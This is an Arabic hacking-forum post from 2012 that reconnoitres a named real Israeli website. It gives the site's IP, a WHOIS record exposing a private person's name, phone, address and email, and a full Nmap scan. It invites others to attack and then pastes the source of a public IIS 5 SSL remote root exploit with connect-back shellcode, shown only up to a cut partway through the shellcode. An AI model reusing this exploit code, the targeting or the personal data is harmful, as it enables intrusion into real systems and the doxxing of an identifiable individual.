MASTER-HACK
03-05-2012, 11:18 AM
هاذا حضرت الاي بي من الدوس
149.126.72.118
الموقع المستضيع لموقعهم
isoc.org.il
وهذه معلومات من نت كرافت
اخر تعديل للموقع من 15 يوم
اسم السيرفر ns1.dreamhost.com
وهاذا الـ DNS admin
hostmaster@dreamhost.com
النظام
Linux
وهاذه معلومات الاتصال
query: hacking.org.il
reg-name: hacking
domain: hacking.org.il
descr: BetterNet
descr: Neot golan 3
descr: rishon le zion
descr: 75691
descr: Israel
phone: +972 52 6810666
fax-no: +972 3 5586521
e-mail: guy AT betternet.co.il
admin-c: II-GM8296-IL
tech-c: II-GM8296-IL
zone-c: II-GM8296-IL
nserver: ns1.dreamhost.com
nserver: ns2.dreamhost.com
nserver: ns3.dreamhost.com
validity: 04-06-2012
status: Transfer Allowed
changed: domain-registrar AT isoc.org.il 20060604 (Assigned)
changed: domain-registrar AT isoc.org.il 20070819 (Changed)
changed: domain-registrar AT isoc.org.il 20071126 (Changed)
person: Guy Mizrahi
address: BetterNet
address: Neot Golan 3
address: Rishon Le Zion
address: 75691
address: Israel
phone: +972 52 6810666
fax-no: +972 3 5586521
e-mail: guy AT betternet.co.il
nic-hdl: II-GM8296-IL
changed: domain-registrar AT isoc.org.il 20060604
registrar name: Israel Internet Association ISOC-IL
registrar info: www.isoc.org.il
وهاذا تاريخ انشاء السيرفر وتاريخ انتهاء صلاحيته
Created:2006-06-04
Expires:2012-06-04
وهاذا فحص بالأداة الجميلة Nmap
NSE: Loaded 57 scripts for scanning.
Initiating Ping Scan at 11:45
Scanning 149.126.72.118 [4 ports]
Completed Ping Scan at 11:45, 0.95s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:45
Completed Parallel DNS resolution of 1 host. at 11:45, 0.42s elapsed
Initiating SYN Stealth Scan at 11:45
Scanning 149.126.72.118 [1000 ports]
Discovered open port 80/tcp on 149.126.72.118
Discovered open port 8080/tcp on 149.126.72.118
Discovered open port 50000/tcp on 149.126.72.118
Discovered open port 443/tcp on 149.126.72.118
Discovered open port 81/tcp on 149.126.72.118
Discovered open port 5222/tcp on 149.126.72.118
Discovered open port 8090/tcp on 149.126.72.118
Discovered open port 5280/tcp on 149.126.72.118
Completed SYN Stealth Scan at 11:45, 24.77s elapsed (1000 total ports)
Initiating Service scan at 11:45
Scanning 8 services on 149.126.72.118
Completed Service scan at 11:47, 121.89s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 149.126.72.118
Retrying OS detection (try #2) against 149.126.72.118
Initiating Traceroute at 11:47
Completed Traceroute at 11:47, 1.38s elapsed
Initiating Parallel DNS resolution of 13 hosts. at 11:47
Completed Parallel DNS resolution of 13 hosts. at 11:47, 0.80s elapsed
NSE: Script scanning 149.126.72.118.
Initiating NSE at 11:47
Completed NSE at 11:48, 30.92s elapsed
Nmap scan report for 149.126.72.118
Host is up (0.14s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http?
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Site doesn't have a title (text/html).
81/tcp open hosts2-ns?
443/tcp open https?
5222/tcp open xmpp-client?
5280/tcp open xmpp-bosh?
8080/tcp open http-proxy?
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
8090/tcp open unknown
50000/tcp open ibm-db2?
6 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=5.51%I=7%D=2/27%Time=4F4B42B4%P=i686-pc-windows-windows%r(
SF:GetRequest,1D3,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nContent-T
SF:ype:\x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x203
SF:10\r\nIinfo:\x2011-716184-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-632114
SF:\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOIND
SF:EX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSA
SF:I=5_F764E933&incident_id=0-6444375094985035\"\x20frameborder=0\x20width
SF:=\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0
SF:px\">Request\x20unsuccessful\.\x20Incapsula\x20incident \x20ID:\x200-644
SF:4375094985035</iframe></html>")%r(HTTPOptions,1D3,"HTTP/1\.1\x20503\x20
SF:Service\x20Unavailable\r\nContent-Type:\x20text/html\r\nCache-Control:\
SF:x20no-cache\r\nContent-Length:\x20310\r\nIinfo:\x2012-789990-0\x200NNN\
SF:x20q\(0\x20-1\x20-1\)\x20r\(-632118\x20-1\)\r\n\r\n<html><head>******\x2
SF:0NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20
SF:src=\"/_Incapsula_Resource\?CWUDNSAI=5_24BC633E&incident_id=0-710949802
SF:5410892\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20marg
SF:inheight=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20In
SF:capsula\x20incident\x20ID:\x200-7109498025410892</iframe></html>")%r(RT
SF:SPRequest,1CB,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x20310\r\nIin
SF:fo:\x208-470133-0\x200NNN\x20q\(-1\x20-1\x20-1\)\x20r\(-632121\x20-1\)\
SF:r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NO
SF:FOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSAI=2_43C55
SF:169&incident_id=0-4167913579086152\"\x20frameborder=0\x20width=\"100%\"
SF:\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0px\">Requ
SF:est\x20unsuccessful\.\x20Incapsula\x20incident\ x20ID:\x200-416791357908
SF:6152</iframe></html>")%r(X11Probe,1CB,"HTTP/1\.1\x20400\x20Bad\x20Reque
SF:st\r\nContent-Type:\x20text/html\r\nCache-Control:\x20no-cache\r\nConte
SF:nt-Length:\x20310\r\nIinfo:\x209-538690-0\x200NNN\x20q\(-1\x20-1\x20-1\
SF:)\x20r\(-632126\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20
SF:CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Re
SF:source\?CWUDNSAI=2_2EFE1E68&incident_id=0-4781595686207817\"\x20framebo
SF:rder=0\x20width=\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20
SF:marginwidth=\"0px\">Request\x20unsuccessful\.\x20Incapsula\x20incident \
SF:x20ID:\x200-4781595686207817</iframe></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port81-TCP:V=5.51%I=7%D=2/27%Time=4F4B42B3%P=i686-pc-windows-windows%r(
SF:GetRequest,1D2,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nContent-T
SF:ype:\x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x203
SF:10\r\nIinfo:\x209-538632-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-632108\
SF:x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDE
SF:X,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSAI
SF:=5_16194732&incident_id=0-4781441067385161\"\x20frameborder=0\x20width=
SF:\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0p
SF:x\">Request\x20unsuccessful\.\x20Incapsula\x20incident \x20ID:\x200-4781
SF:441067385161</iframe></html>")%r(HTTPOptions,1D3,"HTTP/1\.1\x20503\x20S
SF:ervice\x20Unavailable\r\nContent-Type:\x20text/html\r\nCache-Control:\x
SF:20no-cache\r\nContent-Length:\x20310\r\nIinfo:\x2013-970738-0\x200NNN\x
SF:20q\(0\x20-1\x20-1\)\x20r\(-632142\x20-1\)\r\n\r\n<html><head>******\x20
SF:NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20s
SF:rc=\"/_Incapsula_Resource\?CWUDNSAI=5_274CAB50&incident_id=0-8737376529
SF:940813\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20margi
SF:nheight=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Inc
SF:apsula\x20incident\x20ID:\x200-8737376529940813</iframe></html>")%r(RPC
SF:Check,1CF,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x20312\r\nIinfo:\
SF:x2015-1288770-0\x200NNN\x20q\(-1\x20-1\x20-1\)\x20r\(-632146\x20-1\)\r\
SF:n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFO
SF:LLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSAI=2_E1DD1B6
SF:3&incident_id=0-11752314722713935\"\x20frameborder=0\x20width=\"100%\"\
SF:x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0px\">Reque
SF:st\x20unsuccessful\.\x20Incapsula\x20incident\x 20ID:\x200-1175231472271
SF:3935</iframe></html>")%r(FourOhFourRequest,1D3,"HTTP/1\.1\x20503\x20Ser
SF:vice\x20Unavailable\r\nContent-Type:\x20text/html\r\nCache-Control:\x20
SF:no-cache\r\nContent-Length:\x20310\r\nIinfo:\x2010-628971-0\x200NNN\x20
SF:q\(0\x20-1\x20-1\)\x20r\(-632150\x20-1\)\r\n\r\n<html><head>******\x20NA
SF:ME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src
SF:=\"/_Incapsula_Resource\?CWUDNSAI=5_4E15851D&incident_id=0-563831710770
SF:8234\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20marginh
SF:eight=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Incap
SF:sula\x20incident\x20ID:\x200-5638317107708234</iframe></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5222-TCP:V=5.51%I=7%D=2/27%Time=4F4B42B3%P=i686-pc-windows-windows%
SF:r(GetRequest,1D3,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nContent
SF:-Type:\x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x2
SF:0310\r\nIinfo:\x2010-628864-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-6321
SF:08\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOI
SF:NDEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDN
SF:SAI=5_B5C1BB0C&incident_id=0-5637694337450314\"\x20frameborder=0\x20wid
SF:th=\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\
SF:"0px\">Request\x20unsuccessful\.\x20Incapsula\x20incident \x20ID:\x200-5
SF:637694337450314</iframe></html>")%r(GenericLines,1CC,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nContent-Type:\x20text/html\r\nCache-Control:\x20no
SF:-cache\r\nContent-Length:\x20310\r\nIinfo:\x2010-628958-0\x200NNN\x20q\
SF:(-1\x20-1\x20-1\)\x20r\(-632142\x20-1\)\r\n\r\n<html><head>******\x20NAM
SF:E=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src=
SF:\"/_Incapsula_Resource\?CWUDNSAI=2_94BC1A40&incident_id=0-5638149603983
SF:690\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20marginhe
SF:ight=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Incaps
SF:ula\x20incident\x20ID:\x200-5638149603983690</iframe></html>")%r(HTTPOp
SF:tions,1D3,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nContent-Type:\
SF:x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x20310\r\
SF:nIinfo:\x2010-628965-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-632146\x20-
SF:1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x
SF:20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSAI=5_F
SF:2B62A30&incident_id=0-5638261273133386\"\x20frameborder=0\x20width=\"10
SF:0%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0px\">
SF:Request\x20unsuccessful\.\x20Incapsula\x20incid ent\x20ID:\x200-56382612
SF:73133386</iframe></html>")%r(RTSPRequest,1CC,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/html\r\nCache-Control:\x20no-cache\r
SF:\nContent-Length:\x20310\r\nIinfo:\x2011-716247-0\x200NNN\x20q\(-1\x20-
SF:1\x20-1\)\x20r\(-632150\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBO
SF:TS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Inca
SF:psula_Resource\?CWUDNSAI=2_8212F357&incident_id=0-6444791706812747\"\x2
SF:0frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20marginheight=\"0
SF:px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Incapsula\x20i
SF:ncident\x20ID:\x200-6444791706812747</iframe></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5280-TCP:V=5.51%I=7%D=2/27%Time=4F4B42B3%P=i686-pc-windows-windows%
SF:r(GetRequest,1D3,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nContent
SF:-Type:\x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x2
SF:0310\r\nIinfo:\x2010-628865-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-6321
SF:08\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOI
SF:NDEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDN
SF:SAI=5_A1166F15&incident_id=0-5637702927384906\"\x20frameborder=0\x20wid
SF:th=\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\
SF:"0px\">Request\x20unsuccessful\.\x20Incapsula\x20incident \x20ID:\x200-5
SF:637702927384906</iframe></html>")%r(GenericLines,1CC,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nContent-Type:\x20text/html\r\nCache-Control:\x20no
SF:-cache\r\nContent-Length:\x20310\r\nIinfo:\x2011-716237-0\x200NNN\x20q\
SF:(-1\x20-1\x20-1\)\x20r\(-632143\x20-1\)\r\n\r\n<html><head>******\x20NAM
SF:E=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src=
SF:\"/_Incapsula_Resource\?CWUDNSAI=2_ACB3CA14&incident_id=0-6444753052107
SF:083\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20marginhe
SF:ight=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Incaps
SF:ula\x20incident\x20ID:\x200-6444753052107083</iframe></html>")%r(HTTPOp
SF:tions,1D3,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nContent-Type:\
SF:x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x20310\r\
SF:nIinfo:\x2013-970748-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-632146\x20-
SF:1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x
SF:20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSAI=5_9
SF:1337808&incident_id=0-8737458134319437\"\x20frameborder=0\x20width=\"10
SF:0%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0px\">
SF:Request\x20unsuccessful\.\x20Incapsula\x20incid ent\x20ID:\x200-87374581
SF:34319437</iframe></html>")%r(RTSPRequest,1CC,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/html\r\nCache-Control:\x20no-cache\r
SF:\nContent-Length:\x20310\r\nIinfo:\x2014-122033-0\x200NNN\x20q\(-1\x20-
SF:1\x20-1\)\x20r\(-632150\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBO
SF:TS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Inca
SF:psula_Resource\?CWUDNSAI=2_9BA5AB3B&incident_id=0-1072105447096654\"\x2
SF:0frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20marginheight=\"0
SF:px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Incapsula\x20i
SF:ncident\x20ID:\x200-1072105447096654</iframe></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=5.51%I=7%D=2/27%Time=4F4B42B4%P=i686-pc-windows-windows%
SF:r(GetRequest,1D2,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nContent
SF:-Type:\x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x2
SF:0310\r\nIinfo:\x209-538679-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-63211
SF:4\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOIN
SF:DEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNS
SF:AI=5_DFB29A33&incident_id=0-4781522671763785\"\x20frameborder=0\x20widt
SF:h=\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"
SF:0px\">Request\x20unsuccessful\.\x20Incapsula\x20incident \x20ID:\x200-47
SF:81522671763785</iframe></html>")%r(HTTPOptions,1D3,"HTTP/1\.1\x20503\x2
SF:0Service\x20Unavailable\r\nContent-Type:\x20text/html\r\nCache-Control:
SF:\x20no-cache\r\nContent-Length:\x20310\r\nIinfo:\x2011-716192-0\x200NNN
SF:\x20q\(0\x20-1\x20-1\)\x20r\(-632118\x20-1\)\r\n\r\n<html><head>******\x
SF:20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x2
SF:0src=\"/_Incapsula_Resource\?CWUDNSAI=5_BA764868&incident_id=0-64444309
SF:29559883\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20mar
SF:ginheight=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20I
SF:ncapsula\x20incident\x20ID:\x200-6444430929559883</iframe></html>")%r(R
SF:TSPRequest,1CC,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x20310\r\nIi
SF:nfo:\x2013-970680-0\x200NNN\x20q\(-1\x20-1\x20-1\)\x20r\(-632121\x20-1\
SF:)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20
SF:NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSAI=2_CDC
SF:6A957&incident_id=0-8736835364061517\"\x20frameborder=0\x20width=\"100%
SF:\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0px\">Re
SF:quest\x20unsuccessful\.\x20Incapsula\x20inciden t\x20ID:\x200-8736835364
SF:061517</iframe></html>")%r(FourOhFourRequest,1D3,"HTTP/1\.1\x20503\x20S
SF:ervice\x20Unavailable\r\nContent-Type:\x20text/html\r\nCache-Control:\x
SF:20no-cache\r\nContent-Length:\x20310\r\nIinfo:\x2010-628927-0\x200NNN\x
SF:20q\(0\x20-1\x20-1\)\x20r\(-632126\x20-1\)\r\n\r\n<html><head>******\x20
SF:NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20s
SF:rc=\"/_Incapsula_Resource\?CWUDNSAI=5_4A2CD12F&incident_id=0-5637887610
SF:978634\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20margi
SF:nheight=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Inc
SF:apsula\x20incident\x20ID:\x200-5637887610978634</iframe></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port50000-TCP:V=5.51%I=7%D=2/27%Time=4F4B42B3%P=i686-pc-windows-windows
SF:%r(GetRequest,1D2,"HTTP/1\.1\x20503\x20Service\x20Unavailable\r\nConten
SF:t-Type:\x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x
SF:20310\r\nIinfo:\x209-538631-0\x200NNN\x20q\(0\x20-1\x20-1\)\x20r\(-6321
SF:08\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOI
SF:NDEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDN
SF:SAI=5_61BF333D&incident_id=0-4781436772417865\"\x20frameborder=0\x20wid
SF:th=\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\
SF:"0px\">Request\x20unsuccessful\.\x20Incapsula\x20incident \x20ID:\x200-4
SF:781436772417865</iframe></html>")%r(ibm-db2-das,1CC,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\nContent-Type:\x20text/html\r\nCache-Control:\x20no-
SF:cache\r\nContent-Length:\x20310\r\nIinfo:\x2011-716236-0\x200NNN\x20q\(
SF:-1\x20-1\x20-1\)\x20r\(-632142\x20-1\)\r\n\r\n<html><head>******\x20NAME
SF:=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src=\
SF:"/_Incapsula_Resource\?CWUDNSAI=2_BC29D177&incident_id=0-64447487571397
SF:87\"\x20frameborder=0\x20width=\"100%\"\x20height=\"100%\"\x20marginhei
SF:ght=\"0px\"\x20marginwidth=\"0px\">Request\x20unsuccessful\.\x20Incapsu
SF:la\x20incident\x20ID:\x200-6444748757139787</iframe></html>")%r(ibm-db2
SF:,1CC,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/html\
SF:r\nCache-Control:\x20no-cache\r\nContent-Length:\x20310\r\nIinfo:\x2011
SF:-716239-0\x200NNN\x20q\(-1\x20-1\x20-1\)\x20r\(-632146\x20-1\)\r\n\r\n<
SF:html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"NOINDEX,\x20NOFOLLOW\"
SF:></head><iframe\x20src=\"/_Incapsula_Resource\?CWUDNSAI=2_1CD5B26F&inci
SF:dent_id=0-6444761642041675\"\x20frameborder=0\x20width=\"100%\"\x20heig
SF:ht=\"100%\"\x20marginheight=\"0px\"\x20marginwidth=\"0px\">Request\x20u
SF:nsuccessful\.\x20Incapsula\x20incident\x20ID:\x 200-6444761642041675</if
SF:rame></html>")%r(drda,1CF,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConten
SF:t-Type:\x20text/html\r\nCache-Control:\x20no-cache\r\nContent-Length:\x
SF:20312\r\nIinfo:\x2015-1288782-0\x200NNN\x20q\(-1\x20-1\x20-1\)\x20r\(-6
SF:32150\x20-1\)\r\n\r\n<html><head>******\x20NAME=\"ROBOTS\"\x20CONTENT=\"
SF:NOINDEX,\x20NOFOLLOW\"></head><iframe\x20src=\"/_Incapsula_Resource\?CW
SF:UDNSAI=2_DD3AD30A&incident_id=0-11752417801929039\"\x20frameborder=0\x2
SF:0width=\"100%\"\x20height=\"100%\"\x20marginheight=\"0px\"\x20marginwid
SF:th=\"0px\">Request\x20unsuccessful\.\x20Incapsula\x20incident \x20ID:\x2
SF:00-11752417801929039</iframe></html>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|WAP|broadband router|general purpose|webcam
Running (JUST GUESSING): Linux 2.6.X (91%), D-Link Linux 2.4.X (90%), Netgear embedded (90%), Asus Linux 2.6.X (86%), AXIS Linux 2.6.X (86%), Nokia Linux 2.6.X (85%)
Aggressive OS guesses: Linux 2.6.24 (Palm Pre mobile phone) (91%), D-Link DSL-G624T wireless ADSL router (MontaVista embedded Linux 2.4.17), or Netgear DG834Bv3 ADSL router or DG834G WAP (90%), Netgear DG834G WAP (87%), Linux 2.6.18 (86%), Smoothwall Express 3.0 (Linux 2.6.16) (86%), Asus RT-N16 WAP (Linux 2.6) (86%), AXIS 211A Network Camera (Linux 2.6) (86%), AXIS 211A Network Camera (Linux 2.6.20) (86%), Linux 2.6.18-8.el5 (Red Hat Enterprise Linux 5) (85%), Linux 2.6.20 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 14.298 days (since Mon Feb 13 04:38:31 2012)
Network Distance: 13 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 0.00 ms 192.168.1.1
2 187.00 ms 84-235-124-11.saudi.net.sa (84.235.124.11)
3 172.00 ms 84-235-44-89.static.saudi.net.sa (84.235.44.89)
4 187.00 ms 84-235-42-221.static.saudi.net.sa (84.235.42.221)
5 140.00 ms 84-235-12-41.static.saudi.net.sa (84.235.12.41)
6 140.00 ms 84-235-120-17.igw.com.sa (84.235.120.17)
7 250.00 ms 146.82.53.5
8 125.00 ms xe-4-2-0.parigi52.par.seabone.net (195.22.210.32)
9 219.00 ms xe-0-0-2.cr1.cdg1.fr.nlayer.net (69.22.139.49)
10 234.00 ms xe-1-2-1.cr1.fra1.de.nlayer.net (69.22.142.58)
11 235.00 ms xe-2-2-0.cr1.ams2.nl.nlayer.net (69.22.142.69)
12 140.00 ms as23352.xe-4-2-0-105.cr1.ams2.nl.nlayer.net (69.22.139.121)
13 140.00 ms 149.126.72.118
Read data files from: C:\Program Files\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.69 seconds
Raw packets sent: 3106 (141.680KB) | Rcvd: 88 (4.330KB)
طبعاً هاذا كله كلام فاضي واراهن ان ما احد قرأ شيئ
المهم ~~
البورتات
http://img853.imageshack.us/img853/4969/39251797.png
طبعاً البورتات دي كلها مفتوحة (هع بورت 443 مفتوح "يلا شباب الي يعرفون للميتا ما يتأخرون عنا بشيئ ")
استغلال بورت 443
/************************************************** ***************************/
/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports */
/* v0.2 - This little update uses a connectback shell ! */
/* v0.1 - First release with portbinding shell on 31337 */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/************************************************** ***************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x 82\x01\x00\x00\x00";
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x 6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x 53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\x ff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x 8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x 5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x 51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x 8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x 09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x 5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x 01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\x fe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\x c7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x 45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x 35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x 53\x56\x46"
